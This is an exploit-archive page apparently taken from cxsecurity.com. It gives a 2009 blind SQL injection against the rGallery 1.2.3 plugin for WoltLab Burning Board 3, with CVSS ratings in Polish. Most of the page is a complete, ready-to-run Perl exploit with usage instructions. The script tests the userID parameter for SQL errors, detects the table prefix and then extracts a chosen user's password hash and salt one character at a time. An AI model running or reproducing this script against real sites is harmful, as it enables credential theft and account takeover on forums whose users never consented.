WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit

2009-07-03 / 2009-07-04
Credit: Invisibility
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#!/usr/bin/perl -w use strict; use LWP::Simple; $| = 1; print q { ############################# ## WBB3 Blind SQL-Injector ## #### Exploit in rGallery #### ###### by Invisibility ###### ############################# \\\ Special greetz to # // Katharsis/**/nobody # \\\ Gunner/**/Cheese # // Thx ;) # ############################# }; if (@ARGV < 3) { print "Usage: wbb3sploit.pl [url] [user id] [User Gallery userID] \nExample: wbb3sploit.pl www.target.com 1 5\n"; print "[User Gallery UserID] has to be the ID of a User, who has got pictures.\nExample: www.target.com/index.php?page=RGalleryUserGallery&userID=5\n"; exit; } my $url = shift; my $uid = shift; my $galid = shift; my $prefix; my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0'); print "~ Is it vulnerable?...\n"; my $chreq = get("http://".$url."/index.php?page=RGalleryUserGallery&userID='"); if (($chreq =~ m/Fatal error/i) || ($chreq =~ m/Invalid SQL/i)) { print "Nice, seems to be vulnerable!\n"; } else { print "Seems to be patched, sorry\n"; exit; } print "~ Checking Prefix...\n"; if ($chreq =~ m/_wcf/i) { print "~ Found Prefix '$1'\n"; $prefix = $1; } else { print "~ Can't find prefix, using 'wcf1_'\n"; $prefix = "wcf1_"; } print "~ Exploiting...\n"; print "~^~ Hash: "; my $counter = 1; my $countersalt = 1; while($counter < 41) { foreach(@charset) { my $ascode = ord($_); my $result = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/password/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$counter."))=".$ascode.""); if (length($result) != 0) { if ($result =~ "Keine") { } else{ print chr($ascode); $counter++; } } } } my $saltcheck = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),1))>0"); if($saltcheck =~ "Keine") { } else { print "\n~^~ Salt: "; while($countersalt < 41) { foreach(@charset) { my $ascodesalt = ord($_); my $resultsalt = get("http://".$url."/index.php?page=RGalleryUserGallery&userID=".$galid."/**/AND/**/ascii(substring((SELECT/**/salt/**/FROM/**/".$prefix."user/**/WHERE/**/userid=".$uid."),".$countersalt."))=".$ascodesalt.""); if (length($resultsalt) != 0) { if ($resultsalt =~ "Keine") { } else{ print chr($ascodesalt); $countersalt++; } } } } } print "\n~ Done! Exploit by Invisibility\n";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top